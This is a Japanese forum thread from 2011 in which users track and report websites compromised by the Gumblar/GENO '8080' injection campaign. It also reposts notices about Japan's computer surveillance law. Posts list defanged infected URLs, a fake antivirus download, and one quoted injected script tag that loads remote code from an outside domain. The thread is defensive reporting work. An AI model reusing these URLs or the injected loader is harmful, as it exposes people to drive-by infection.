サイバー犯罪対策の名の下にコンピュータへの監視・規制を強めようとするコ
ンピュータ監視法の制定を許してはなりません。
同法は、現在共謀罪新設法案とともに廃案となりましたが、法務省などの同法
推進派が条約の批准を理由にいつ上程してくるかはわかりません。
サイバー犯罪条約とは何か、コンピュータ監視法とは何か、学習会を開きます。
ぜひ、ご参加ください。
706名無しさん@お腹いっぱい。:2011/01/25(火) 16:05:17
652 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 05:34:58 ID:ATQNV0HP0 [4/5]
>>645
と き  1月25日(月)18時40分〜21時
ところ  ピープルズ・プラン研究所会議室
(東京都文京区関口1-44-3 信生堂ビル2F
Tel:03-6424-574 8 地下鉄有楽町線江戸川橋駅1B出口徒歩5分)
     http://maps.google.co.jp/maps?hl=ja&utm_source=ja-hp
お話し 山下幸夫さん(弁護士)
    「サイバー犯罪条約とコンピュータ監視法」
    小倉利丸さん(富山大学教員)
    「コンピュータ監視法の問題点」
参加費 500円
主 催 盗聴法に反対する市民連絡会
連絡先 日本消費者連盟 Tel.03-5155-476 5
    ネットワーク反監視プロジェクト Tel.070-5553-549 5
・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・
コメント (0)トラックバック (0)閲覧 (405)

no more capitalism - 1・25コンピュター監視法学習会のご案内
http://alt-movements.org/no_more_capitalism/modules/no_more_cap_blog/details.php?bid=13
東京都文京区関口1-44-3 - Google マップ - 信生堂ビル2F
http://maps.google.com/maps?ja&channel=suggest&q=%E6%9D%B1%E4%BA%AC%E9%83%BD%E6%96%87%E4%BA%AC%E5%8C%BA%E9%96%A2%E5%8F%A31-44-3
707名無しさん@お腹いっぱい。:2011/01/25(火) 16:07:06
653 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 05:37:53 ID:ATQNV0HP0 [5/5]
日曜日, 1月 23rd, 2011 | Posted by KIMURA
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月)

http://www.ustream.tv/recorded/12218086

 ジャーナリスト岩上安身さんのスタッフが生中継を行いました。
 流れとしては、
「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」(通称コンピューター監視法)が提出され、
可決を契機に、現在日本は批准していない国際的なテロ防止と称して情報通信を監視する「サイバー犯罪条約」に批准することが考えられ、
さらに批准を契機に盗聴法改正まで行われるのではないかという見解がある。
広く考えると、憲法によって守られている通信の秘密や表現の自由までも国家権力が脅かしうるという、危険な状況で、
さらにこの法改正を理由に憲法の解釈を変えたり、場合によっては憲法改正までもが行われるのではないか、とも言われている。
 日弁連を中心にこの「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」を廃案にするための動きが起きている。
 もしもこの法改正が進めば、インターネットや携帯電話による市民の情報通信は常に監視されることになるだろう。
警察による通信履歴の検閲や、コンピューター上でのプログラミングすらも、ウィルス作成罪にあたるとして取り締まることが可能になる。
 盗聴法<組対法>に反対する市民連絡会では、プライバシーを侵害し、表現の自由を規制する盗聴法の廃止を求める市民団体共同声明に賛同を募っている。 http://www.anti-tochoho.org/ut/ss20100201.html
708名無しさん@お腹いっぱい。:2011/01/25(火) 16:09:52
 資料としてこちらのHPを一緒にご覧ください。

 コンピュータ監視法に対する疑問(盗聴法<組対法>に反対する市民連絡会 )
 http://www.anti-tochoho.org/ut/gg20101214.html
 サイバー犯罪条約 http://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html
 日弁連が提出したサイバー犯罪条約への意見書 http://www.nichibenren.or.jp/ja/opinion/report/2004_23.html


【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
http://portside-station.net/2011/01/23/6859/
709名無しさん@お腹いっぱい。:2011/01/25(火) 16:29:41
総務省のインフルエンザのページ貼ったらファビョってしまったようだ
すまない
710名無しさん@お腹いっぱい。:2011/01/28(金) 16:12:22
これなんだ?

analyzer5.fc2.com:8080/ana/processor.php?uid=107662

analyzer5.fc2.com:8080/ana/analyzer.php?uid=107662&pid=0&idsess=&ref=&href=http%3A//zbrjinsoul4.web.fc2.com/&wid=1024&hei=1024&col=24&visitor=1-1642776976-1296198419-0-1-1-0
711名無しさん@お腹いっぱい。:2011/01/28(金) 17:04:37
FC2のアクセス解析だろ
712名無しさん@お腹いっぱい。:2011/01/28(金) 18:13:57
fc2のアナライザーはadblockなんかでブロックしても特に問題ない
713名無しさん@お腹いっぱい。:2011/01/28(金) 19:45:40
>>710
お前さんがFC2アクセス解析が入っているページ(主にFC2ブログ)にリンクを貼った

そのサイト主がFC2アクセス解析を見てリンクを辿った

それがお前さんのサイトのアクセス解析に残った

そんだけ
鑑定は他でやれ
714素人:2011/01/31(月) 16:50:34
ブラウザを見ただけでボットに感染することってありますか?
715名無しさん@お腹いっぱい。:2011/01/31(月) 16:52:41
>>714
感染した感じがしたら、もう掛かってますw
716名無しさん@お腹いっぱい。:2011/01/31(月) 17:55:26
>>714
どこからここにたどり着いちゃったの?
素人をアピールすることに何の意味があるの?
ブラウザを見るってのは実行ファイルを見るってこと?
ファイル見ただけじゃ感染しようがないでしょ
717名無しさん@お腹いっぱい。:2011/02/05(土) 00:27:38
オミトロンに登録した古いGenoウイルス警告スクリプトがこのサイトに反応した
www●no-review●net/
Javaスク切った状態でアクセスしてるから異常は無いと思うんでウイルスチェックはしてない。
みんなはどう?
718名無しさん@お腹いっぱい。:2011/02/05(土) 12:07:10
719名無しさん@お腹いっぱい。:2011/02/05(土) 12:12:02
最近活気無いなあ
そろそろいいの?
720名無しさん@お腹いっぱい。:2011/02/05(土) 15:07:10
>>717
いろいろアレだけど
JavaScriptオフで防げないのもあるから注意してね
721名無しさん@お腹いっぱい。:2011/02/05(土) 18:00:54
【AV女優】晶エリー(大沢佑香)の公式サイトがGENOウイルスに感染中!
http://hato.2ch.net/test/read.cgi/news/1296896238/
722名無しさん@お腹いっぱい。:2011/02/05(土) 19:49:42
>>721
ソース見たけど1行目からロシア行こうとしててすごくおろロシア
末尾にもあるね
723/名無しさん[1-30] ◆.htmlint.U :2011/02/05(土) 20:37:36
>>721
whoisでぬるぽ完了。
724名無しさん@お腹いっぱい。:2011/02/05(土) 22:17:38
>>721-723
消滅じゃなくて戦略的撤退だったのね・・

改竄祭絶賛開催中
isawa-crystal●com/
ソース見てワラタ
725名無しさん@お腹いっぱい。:2011/02/05(土) 22:27:05
>>724
ひどすぎて吹いた
danさん経由なのにAviraが怒り出すしひどい
726/名無しさん[1-30] ◆.htmlint.U :2011/02/06(日) 00:55:38
>>724

whoisからメルかんりょ
727名無しさん@お腹いっぱい。:2011/02/09(水) 20:00:55
>>726

どっとこむ8080装填中
club-garcons●com/
728/名無しさん[1-30] ◆.htmlint.U :2011/02/09(水) 20:13:00
>>727
banana3306●maido3●com
う〜む。。。
729/名無しさん[1-30] ◆.htmlint.U :2011/02/09(水) 21:19:50
>>727
いちおメルすた。
連絡先がドコダなので蹴られている可能性大。。。
730名無しさん@お腹いっぱい。:2011/02/09(水) 21:47:05
731名無しさん@お腹いっぱい。:2011/02/25(金) 21:01:47.73
システム復元で偽セキュリティを駆除できると思ってる大馬鹿者が急増してるなw
732/名無しさん[1-30] ◆.htmlint.U :2011/02/27(日) 07:12:12.15
VTがおかひいお。。。
733/名無しさん[1-30] ◆.htmlint.U :2011/03/04(金) 15:22:19.35
(・肉・) トレトレピチピチカニリョーリ♪

JSUNPACK
6e2cf8ebd8635107d4e26b2861c3a26cf4073e14
734名無しさん@お腹いっぱい。:2011/03/07(月) 19:28:14.33
みん(なあたま)カラ(っぽ)とは良く言ったもんだwww
ttp://minkara.carview.co.jp/userid/361321/blog/21640486/
ttp://minkara.carview.co.jp/userid/361321/blog/21668229/

【セキュリティの強化】って、具体的に何をすれば良いのかブログ書いてくれよw
735/名無しさん[1-30] ◆.htmlint.U :2011/03/07(月) 22:01:29.92
>>734
こりか。。。

壁紙を変更する偽セキュリティソフト、国内で感染報告が増える
http://internet.watch.impress.co.jp/docs/news/20110307_431684.html
http://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20110304050209.html
736名無しさん@お腹いっぱい。:2011/03/08(火) 00:50:39.79
>>734
自分で燃料投下して逆ギレとか、どんだけバカなんだよwwww
737!ninja:2011/03/08(火) 01:05:54.25
!ninja
738名無しさん@お腹いっぱい。:2011/03/08(火) 19:52:44.78
>>734
>たぶん、セキュリティがちょっと低く設定されていたか
>JAVAが最新でなかったのが原因で入り込まれたとか考えられるそうです。
>ウイルスバスターも強制終了ww
>エ○サイトのURLはLunascapeに登録していたので消えましたがww

ユーザーのセキュリティー意識が低ければ
糞の役にも立たないウイルスバスターにワロタ
739名無しさん@お腹いっぱい。:2011/03/09(水) 00:39:18.08
>>738
それはなんでも同じじゃね
ユーザーが全て許可をしてしまえばおしまい
740名無しさん@お腹いっぱい。:2011/03/09(水) 10:52:52.72
無知は怖いよ。

アメーバピグのFlashのバージョンアップで運営ブログが炎上したのだって
未だに平気でVer9を使っている連中が原因だぞ。
741名無しさん@お腹いっぱい。:2011/03/09(水) 13:38:09.41
>>739
ウイルスバスターは、低次元な広告を見てもアホユーザーがメイン対象にもかかわらず
そのアホユーザーには効果がないなら、存在が無意味だろうし
アホユーザー前提に設計したほうがいいと思うのよね。

許可するシーンで
例のヤクザ坊主が出てきて、しつこく何度も脅すとか
例の女が発狂しているシーンが出てきて、JAVAのアップデートを促すとかw
742名無しさん@お腹いっぱい。:2011/03/09(水) 13:56:52.09
ドライブバイダウンロードを喰らうバカに多いパターン

1:「○○(セキュリティソフト)を入れてるから大丈夫」と豪語している

2:全てをセキュリティソフトに依存しているため、
地雷(DBD)を踏むと高確率で感染する

3:「○○入れてたのに感染した(怒)」と、セキュリティソフトに文句を言う

4:必死になって駆除方法を捜して駆除は行うが、
感染原因を知ろうとしない為、根本的な対策ができない(駆除方法と一緒に書いてあっても一切見ない)

5:2に戻る


セキュリティソフト依存症は病気(精神疾患)ですよw
743名無しさん@お腹いっぱい。:2011/03/09(水) 17:41:16.81
依存してるんじゃなくて何も知らないだけってのもある
セキュリティソフトも偶然入ってるだけで場合によっては期限切れ

>>741
たしかにそうだね
たとえ誤爆してでも初心者ユーザーには選択肢を与えないほうがきっと安全
バスターが把握していないものは許可しないとかそういうモードをつけてもいいかもしれない
どうせ初心者なら使うソフトも限られてるだろうし
744名無しさん@お腹いっぱい。:2011/03/11(金) 11:02:19.25
「ウイルス作成罪」新設、提供・取得・保管も 改正案閣議決定
http://raicho.2ch.net/test/read.cgi/newsplus/1299802224/

これからは故意でなくても脆弱性を修正しないで放置して
Gumblarようなウィルスの踏み台にされた時点で逮捕されるわけだな。
745名無しさん@お腹いっぱい。:2011/03/11(金) 14:20:44.45
>>744
>作成罪に加え、提供、取得、保管などの罪を新設。

マルウェアの取得が違法

ベンダーに検体が提出されない

極地的に流行るマルウェアに対応できず、感染PCが急増

感染したPCを所有する者は容赦無く逮捕

罰金(30万円以下)と、証拠品として押収したPC(クリーニングされた後、中古品として販売)でガッツリ稼ぐ


さすが欠管政権w
穴だらけなのに隙が無いなwwww
746名無しさん@お腹いっぱい。:2011/03/11(金) 14:36:33.59
記事には書いてないけど、提供・取得・保管が罪になるには前提条件があって
他人のPCを感染させる目的の場合らしいよ
747名無しさん@お腹いっぱい。:2011/03/12(土) 20:03:44.23
>>745
辞民党は何もしてこなかったけどなwwww
748名無しさん@お腹いっぱい。:2011/03/12(土) 21:00:22.21
>>747
法案自体は,2004年2月の第159回国会で閣法(内閣提出法案)として国会に提出されました。
とあるので、何もしてこなかった訳ではないらしい

ウイルス作成罪はいつになったら成立するのか
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20061201/255707/
749名無しさん@お腹いっぱい。:2011/03/12(土) 21:50:09.09
ウイルス作成罪新設 刑法改正案、サイバーテロに厳罰 2011/3/11 8:43
ttp://www.nikkei.com/news/headline/article/g=96958A9C93819481E3E3E2E2EB8DE3E3E2E1E0E2E3E3E2E2E2E2E2E2

> ウイルスの取得や保管も罪になり、2年以下の懲役または30万円以下の罰金。
> 対策ソフトの開発などが処罰対象とならないよう、
> 処罰の要件に「正当な理由なく」との表現を盛り込んだ。

> ウイルス作成罪創設の改正案提出は自公政権当時から3回目。
750名無しさん@お腹いっぱい。:2011/03/13(日) 09:41:52.46
お、停電復帰したようですね貴方
751/名無しさん[1-30] ◆.htmlint.U :2011/03/22(火) 12:00:31.99
752名無しさん@お腹いっぱい。:2011/03/25(金) 16:02:11.01
>>721-722
すまない、いったいどんなソースコードがあったんだ?
753名無しさん@お腹いっぱい。:2011/03/25(金) 22:14:50.02
>>752
だいたいいつものやつだよ
754名無しさん@お腹いっぱい。:2011/03/30(水) 23:33:49.13
(VдV)の俺様ブログ -顔文字の俺様ブログ-
ttp://ruhuraro.blog57.fc2.com/
>このページの表示は許可されていません
>このブログは下記の理由などにより凍結されています。
>* 規約上の違反があった
>* 多数のユーザーに迷惑をかける行為を行った。

震災の記事の件で通報したら消滅すたw
755名無しさん@お腹いっぱい。:2011/03/31(木) 00:24:26.39
756名無しさん@お腹いっぱい。:2011/03/31(木) 00:44:25.75
>>755
こりゃ凍結されても仕方ないわw
757名無しさん@お腹いっぱい。:2011/03/31(木) 08:30:55.71
>>755
閲覧を観覧と書いちゃう男の人って…
758名無しさん@お腹いっぱい。:2011/04/03(日) 01:24:43.57
>>754-755
ttp://ameblo●jp/ruhuraro/entry-10847321466●html
>(VДV)┌ んなことよりfc2でやってる俺様ブログがなぜか凍結されたぜ
>l(VДV)l一体、この俺様が何をしたというのかあぁぁぁぁああああ!!!!
>(VдV )震災をネタにしすぎたかしらん♪ちょっぴ反省w

反省しなくて良いからさっさと氏ねよ
759名無しさん@お腹いっぱい。:2011/04/03(日) 01:40:21.62
760名無しさん@お腹いっぱい。:2011/04/05(火) 00:12:59.51
「ウイルス作成罪」盛り込んだ刑法改正案、国会に提出
http://hatsukari.2ch.net/test/read.cgi/news/1301929633/
761名無しさん@お腹いっぱい。:2011/04/05(火) 19:55:11.97
新型SQLインジェクション攻撃「LizaMoon」多発〜日本でも改ざん例を確認
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2539
762名無しさん@お腹いっぱい。:2011/04/05(火) 23:15:33.13
763名無しさん@お腹いっぱい。:2011/04/06(水) 14:23:29.81
Wo[BLOCKED]ks.com/ur.php
al[BLOCKED]ne.com/ur.php
al[BLOCKED]er.com/ur.php
li[BLOCKED]on.com/ur.php
t6[BLOCKED]56.info/ur.php
764 忍法帖【Lv=9,xxxP】 :2011/04/06(水) 17:10:00.47
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
http://hibari.2ch.net/test/read.cgi/sec/1279692828/
765/名無しさん[1-30] ◆.htmlint.U :2011/04/16(土) 07:50:25.13
>>751
10.2.159.1
766 【東電 83.6 %】 忍法帖【Lv=32,xxxPT】 :2011/04/29(金) 17:33:56.22
!denki!ninja
767名無しさん@お腹いっぱい。:2011/04/30(土) 20:12:14.26
ほんまにわらかしてくれる
無菌状態にしようとするからいたちごっこになる
ゾンビの体でなにが来ても復活できるようにすれば問題なくなる。
仮想環境はもっと使いやすく作れるだろに
セキュリティ産業をすぐにすたれさすのはもったいないと言って
作らない。
768/名無しさん[1-30] ◆.htmlint.U :2011/05/13(金) 12:34:28.57
769名無しさん@お腹いっぱい。:2011/05/14(土) 08:19:11.14
test
770/名無しさん[1-30] ◆.htmlint.U :2011/05/15(日) 02:39:19.30
JSUNPACK
> MySQLdb error
orz...........
771名無しさん@お腹いっぱい。:2011/05/15(日) 12:36:18.69
JsunpackがトンだらとりあえずWepawet使えって爺ちゃんが言ってた
772/名無しさん[1-30] ◆.htmlint.U :2011/05/29(日) 00:05:27.61
>>771
今流行のSEOポイズニングっての突っ込んだら固まったお。。。
773名無しさん@お腹いっぱい。:2011/05/29(日) 12:10:45.96
Wepawetはすげー時間かかるよ
774名無しさん@お腹いっぱい。:2011/05/29(日) 21:30:56.48
6月1日からは日本がインターネットの枠組みそのものから離脱するのかのう
775/名無しさん[1-30] ◆.htmlint.U :2011/05/29(日) 21:32:20.44


も少し待つやうにすんべさ。
776/名無しさん[1-30] ◆.htmlint.U :2011/05/29(日) 21:33:27.36
>>775>>773

>>774
なんぞなもし。
777/名無しさん[1-30] ◆.htmlint.U :2011/06/03(金) 00:39:09.06
>>751
10.3.181.16
* IEのみ
778/名無しさん[1-30] ◆.htmlint.U :2011/06/06(月) 13:19:58.16
>>751
IE 10.3.181.23
Fx 10.3.181.22
779名無しさん@お腹いっぱい。:2011/06/07(火) 02:34:32.29
http://hibari.2ch.net/test/read.cgi/sec/1299413878/l50
ここの >>937 見てみ
香ばしさいっぱいだからwww
780名無しさん@お腹いっぱい。:2011/06/07(火) 08:17:42.63
それNOD32厨の自演だろw
781名無しさん@お腹いっぱい。:2011/06/07(火) 13:14:39.91
>>779
専ブラ使うといいよ
782/名無しさん[1-30] ◆.htmlint.U :2011/06/08(水) 19:55:08.34
783/名無しさん[1-30] ◆.htmlint.U :2011/06/16(木) 01:28:41.58
784名無しさん@お腹いっぱい。:2011/06/21(火) 13:45:48.23
Mass Meshing Injection: sidename.js ongoing
ttp://blog.armorize.com/2011/06/mass-meshing-injection-sidenamejs.html
ttp://www.google.co.jp/search?q=%22script+src%3D%22+sidename.js

まぁ誘導先も正規サイトで組まれているってのは
既にGumblar.xが通った道なので
Armorizeが主張するほど革新的な物ではない気がする
785名無しさん@お腹いっぱい。:2011/06/28(火) 23:20:33.24
アルファルファモザイクの様子がおかしい
786 忍法帖【Lv=15,xxxPT】 :2011/07/26(火) 20:51:36.79
GENOウイルスってもう下火になったのかね
ここも全然レスないし
787名無しさん@お腹いっぱい。:2011/07/27(水) 03:51:53.64
なってないよ
むしろ流行を終えて定着した
788名無しさん@お腹いっぱい。:2011/07/27(水) 12:15:38.09
セキュアブレイン gred セキュリティレポートVol.24【2011年6月分統計】
http://www.securebrain.co.jp/about/news/2011/07/gred-report24.html
789名無しさん@お腹いっぱい。:2011/07/31(日) 00:50:08.30
取扱注意
www●hotel-socatel●be/

釣りに使った場合・・違法になるかどうかはしらん
790名無しさん@お腹いっぱい。:2011/07/31(日) 23:20:35.75
>>786
今の状況は
Gumblar.xは去年から停止中
8080は一部サイトで不審なコードが定期的に追加される状態が起こってる感じ

>>789
うさんくさいサイトのようだけど
トップページには特に不審なコードはないように思うん
791名無しさん@お腹いっぱい。:2011/08/01(月) 02:04:29.96
http://www4.ocn●ne●jp/~scicomm4/eisuri●htm
792名無しさん@お腹いっぱい。:2011/08/01(月) 02:10:32.21
http://www●radio-80●com/soft●exe
偽アンチウィルスソフト配布してるぞ
793/名無しさん[1-30] ◆.htmlint.U :2011/08/01(月) 22:44:56.11
otyu

>>791
おしんにつーほ。

>>792
404
794名無しさん@お腹いっぱい。:2011/08/01(月) 23:49:09.52
http://www●ganbanyoku-tsubaki●jp/
ccドメインのexploitコードを食わされるパターン
795名無しさん@お腹いっぱい。:2011/08/02(火) 00:05:28.87
http://www●expressionengine●jp/
難読化されてるタイプでやっぱりccドメインから
796/名無しさん[1-30] ◆.htmlint.U :2011/08/02(火) 00:13:11.63
いまきた

>>794
こちらの環境だと*.cu.ccより先に逝けない。。。

>>795
あとでみゆ
797/名無しさん[1-30] ◆.htmlint.U :2011/08/02(火) 00:16:30.23
あっー、ひとつ手前の*.cz.ccにも逝けなくなった。。。>>794

アクセスログとってるのか?
798名無しさん@お腹いっぱい。:2011/08/02(火) 00:19:36.11
http://arthurcallum●gozaru●jp
ロシア系?exploitキットのドロップゾーン
404とか嘘ついてんじゃないよ
799名無しさん@お腹いっぱい。:2011/08/02(火) 00:26:36.83
jpから来たの弾くパターンもあるみたいだけど
jpドメインをつかって他国の人間をターゲットにするんかいな
800/名無しさん[1-30] ◆.htmlint.U :2011/08/02(火) 00:31:55.04
>>799
過去ログにその解説があったはずぅー。>>31-32かな。
801/名無しさん[1-30] ◆.htmlint.U :2011/08/02(火) 00:52:46.26
おぉ、よく見なかった。
踏み台とか結構あったよ>>799
802名無しさん@お腹いっぱい。:2011/08/02(火) 01:14:57.81
JP外しは結構前からされてる戦略なのか
儲からんし、めんどくさいんだろうなあ
803/名無しさん[1-30] ◆.htmlint.U :2011/08/02(火) 02:36:14.60
>>794
おくた。

>>795
デジロにつーほ。
でもデジロは遅いので、どなたかふぇーすぶっくから教えてあげてくらはい。。。

>>798
みてみゆ。。。
眠い。
804/名無しさん[1-30] ◆.htmlint.U :2011/08/02(火) 03:19:16.93
二つ目の*.ruに逝けない。。。>>798
805/名無しさん[1-30] ◆.htmlint.U :2011/08/02(火) 03:41:19.34
>>798
とりあえずさくらにつーほ。

あきたねる
806名無しさん@お腹いっぱい。:2011/08/03(水) 07:24:27.95
http://saito-bara●com/funny●html
ccドメインから旅にでます
http://www●e1homes●jp/
おおなつかしいタイプ ロシアに行こう
807名無しさん@お腹いっぱい。:2011/08/03(水) 07:42:31.52
おまけ
http://www●momohime-medical●com/~momohime/deary82●html
http://www●passo-co●jp/~passocojp/lean77●html

両方とも同じグループに属してる?踏み台 薬を売ってくれるサイトに誘導してた痕跡がある
808名無しさん@お腹いっぱい。:2011/08/03(水) 19:05:28.94
てす
809オルティス・ジャパン:2011/08/03(水) 19:36:44.04
>>807
サイバー犯罪対策課に通報済
810名無しさん@お腹いっぱい。:2011/08/03(水) 20:36:25.26
>>807
それは去年の8080の時のものです
その踏み台リンクと画像(deary82.jpg、lean77.jpg)をのせたメールをボットマシンで配信してた
811/名無しさん[1-30] ◆.htmlint.U :2011/08/03(水) 23:29:37.81
昼間2ちゃんねる落ちてたね。

>>806-807
おちゅ
つーほーしました。
812名無しさん@お腹いっぱい。:2011/08/04(木) 10:31:07.90
今も落ちてるよ
813名無しさん@お腹いっぱい。:2011/08/04(木) 22:41:17.10
www●niki-selection●com
今話題の通販系にインジェクションしちゃうタイプ
814/名無しさん[1-30] ◆.htmlint.U :2011/08/04(木) 23:17:56.96
>>813
これからみゆお。

また蹴られてる*.えう
orz....
815/名無しさん[1-30] ◆.htmlint.U :2011/08/05(金) 00:14:57.79
>>813
おちゅ
ど〜ん
816名無しさん@お腹いっぱい。:2011/08/12(金) 08:40:44.69
http://www●sippo-booomb●com/
去年は動いてたようなやつ
ロシアから直接.jsがやってきてたようだ
817/名無しさん[1-30] ◆.htmlint.U :2011/08/12(金) 15:39:24.34
>>816
お疲れ様です。
さくらにつーほ。
818名無しさん@お腹いっぱい。:2011/08/26(金) 03:22:41.51
>>813これだっけ
「osCommerce」の脆弱性を利用したウェブサイトの改ざん被害が拡大 セキュアブレインが『gred セキュリティサービス』『gredでチェック』で対応
http://www.securebrain.co.jp/about/news/2011/08/oscommerce.html
819/名無しさん[1-30] ◆.htmlint.U :2011/08/26(金) 07:51:45.81
Adobe Flash Player 10.3.183.7

もう、メンドイので直リン
http://hibari.2ch.net/test/read.cgi/win/1305730772/5
820名無しさん@お腹いっぱい。:2011/09/06(火) 12:35:37.34
>>818
うん

ttp://jsunpack.jeek.org/dec/go?report=a2b5afc3cdb263167efc5ea36747d128f0921f6d

<title>SELECTION</title><script src=http://exero●eu/catalog/jquery.js></script><title></title>

http://exero●eu/をググると感染サイトがゴロゴロしてるな
821名無しさん@お腹いっぱい。:2011/09/08(木) 05:01:18.67
http://www●asakusa-kagetudo●com/modules/shop/
このディレクトリすごく臭いです。
例えば/shop/es.txt??とか
C&Cサーバっぽいことになってるのかな
822名無しさん@お腹いっぱい。:2011/09/08(木) 05:15:59.59
よくみりゃIRCでボットに命令するみたいだ
823名無しさん@お腹いっぱい。:2011/09/08(木) 05:34:34.77
http://iconic-intl●sakura●ne.jp/
これだけだと問題なさそうだけど
こいつをつけるとwolve●html
害はなさそうだけど、アレなページに飛ぶようだ
こういう会社なんだろうか
824名無しさん@お腹いっぱい。:2011/09/13(火) 19:43:13.58
踏み台にされてるんでしょ
825名無しさん@お腹いっぱい。:2011/09/19(月) 18:12:05.45
Win32/Daonolの亜種で、midi9を使っていないものってありますか?
症状が全く同じもののPCを持っていますが、本来ある場所にあるはずのmidi9がありません。
826名無しさん@お腹いっぱい。:2011/09/19(月) 18:23:15.47
すいません。ウイルスが原因ではない問題だったようです。
スレ汚し失礼しました
827名無しさん@お腹いっぱい。:2011/09/19(月) 21:28:46.92
>>825
あるとおもうよ
そういう調べ方はやめたほうがいい
828名無しさん@お腹いっぱい。:2011/09/24(土) 19:03:28.86
http://www●ibs-radio●com

www●dinsuceava●roがアレですかね・・・
829八頭 ◆YAGApwSaEw :2011/09/24(土) 20:59:42.03
>>828
ですね~

Google セーフ ブラウジング診断 より
疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
過去 90 日間に、このサイトの一部で不審な動きが 2 回検出されています。

このサイトで過去 90 日間に Google がテストした 92 ページのうち 23 ページで、
ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは 2011-09-23 で、このサイトで不審なコンテンツが最後に検出されたのは 2011-09-23 です。
不正なソフトウェアには 24 trojan(s) などがあります。感染先のコンピュータで平均 4 個のプロセスが新たに発生しています。


Online Link Scan (AVG・Google・SiteTruth・PhisTank) ・・・ 未検出
セキュアブレイン gred ・・・ 未検出orz(通報済み)
シマンテック ・・・ 未検出orz(通報済み)
830/名無しさん[1-30] ◆.htmlint.U :2011/09/24(土) 22:12:07.21
今北

>>828
リロードしたらスクリプト消えたん。

>>829
乙です。

とりあえずJSUNPACKにスクリプトかけてみたお。(その間に対応されてた。)
407f4efb5e405a90d8aee230d5676eb4b3b795a6
831八頭 ◆YAGApwSaEw :2011/09/24(土) 22:42:46.61
被害サイトは・・・IBS 茨●放送
茨●県を放送対象地域とする中波(AM)放送局を保有する
基幹放送局提供事業者である
株式会社IBSの設備を利用してラジオ放送を行っている。

茨●方面、他にもあるかもよ
roはルーマニアのドメインだね
832/名無しさん[1-30] ◆.htmlint.U :2011/09/24(土) 23:35:49.05
一応こちらからもJPCERT/CCとIPA他にスクリプトとその先のスクリプト、>>828の下でのぉとんせぃふうぇぶで出てくるjarを送ったお。

VTいきなり死んだ。。。orz.........
833828:2011/09/24(土) 23:52:47.51
>>829-832 ご確認とご対応ありがとうございました。
特に◆.htmlint.Uさんは毎回お疲れ様でございます!
834/名無しさん[1-30] ◆.htmlint.U :2011/09/25(日) 00:00:31.68
識別代わりにコテ付けてるだけです。
八頭さん、コテハンさん、夷塚さんをはじめとするコテの方々、名無しのみなさんに比べればまだまだです。

なによりもお伝えいただいた828さんに感謝です。
835名無しさん@お腹いっぱい。:2011/09/25(日) 04:21:17.06
とりあえずここのスレに挙げられているサイトを
サイトのアドレスの一部をワイルドカードと合わせてavastのサイトブロックに登録するだけで有効かな?
836名無しさん@お腹いっぱい。:2011/09/25(日) 04:24:38.61
http://konishi-ballet●com/
すごいことになってますな
837/名無しさん[1-30] ◆.htmlint.U :2011/09/25(日) 05:57:10.37
>>835
まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので>>832の時にIPAにつーほーすた。

>>828
ここが震源地だたぁーのね。
http://hatsukari.2ch.net/test/read.cgi/news/1316848525/

>>836
目が痛い。。。
838/名無しさん[1-30] ◆.htmlint.U :2011/09/25(日) 07:06:26.95
>>836
お疲れ様です。
鯖缶、上位鯖缶とかにつーほーしました。

茨城繋がりだたーのね。
839八頭 ◆YAGApwSaEw :2011/09/25(日) 12:33:07.67
Tokyo鯖の●阪のバレエ研究所らしいorz
IPA往きが一番いいけど・・・土日とか大丈夫なんだろうか?

>>1
>>5について、日本地域における性能・効果も加味して再検討をしてみた方がいいかも
http://hibari.2ch.net/test/read.cgi/sec/1314348991/7
いづれにしろ攻撃は止まないし、無差別で、拡散も速い
840/名無しさん[1-30] ◆.htmlint.U :2011/09/25(日) 14:58:22.10
>>839
鯖缶が茨城。。。
>>806と同じらしいスクリプトも
誰かが投げた分
http://www.virustotal.com/file-scan/report.html?id=8a354b3b17a4d753f6ed9e6c9f62898b60a4888b8f543eca6abc399199262de7-1312351077
漏れが投げたの
http://www.virustotal.com/file-scan/report.html?id=8a354b3b17a4d753f6ed9e6c9f62898b60a4888b8f543eca6abc399199262de7-1316904594
まぁ偶然だと思いますが。

関連性でいうと大学のアメフト、大学のラクロス、大学の薙刀のほーが感染経路的に分かりやすかったかも。
841名無しさん@お腹いっぱい。:2011/09/25(日) 15:02:37.16
>>837
>まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので>>832の時にIPAにつーほーすた。
何を言っているのかわからない
「ここで出たのを初回として3回目のとこを管理者だめっぽいので」ってどういうこと?
842/名無しさん[1-30] ◆.htmlint.U :2011/09/25(日) 15:06:49.51
>>841
一度対応されてから、再改竄->再対応、再々改竄を確認したのがあったので。
843名無しさん@お腹いっぱい。:2011/09/25(日) 15:14:12.03
日本語では「3回目なので」と言うんだ
844/名無しさん[1-30] ◆.htmlint.U :2011/09/25(日) 15:22:25.01
(゚ν゚)ニホンゴムズカスィネー
845八頭 ◆YAGApwSaEw :2011/09/25(日) 15:43:31.89
>>840
なるほど>>6には無いけど
登録が東京でもピュアニックは茨●なんだね
関連性や着眼点はランダムであっても注視しておいた方が後学にはなるかも

Google セーフ ブラウジング診断は、追跡開始と同時に90日間の結果も教えてくれる
各自、地元放送局やラジオ局など気になるキーワードでざっと調べてみるといいよ
846名無しさん@お腹いっぱい。:2011/09/25(日) 19:05:28.49
>>792はローグソフトばら撒く砲台リンクってわかってここに書いた後、すぐになくなってしまった。
http://www●ganbanyoku-tsubaki●jp/
ここって絶賛放置中でしたっけ
847八頭 ◆YAGApwSaEw :2011/09/25(日) 19:27:00.63
>>846
今現在、TrendMicroとFortinetだけ反応してるようだ
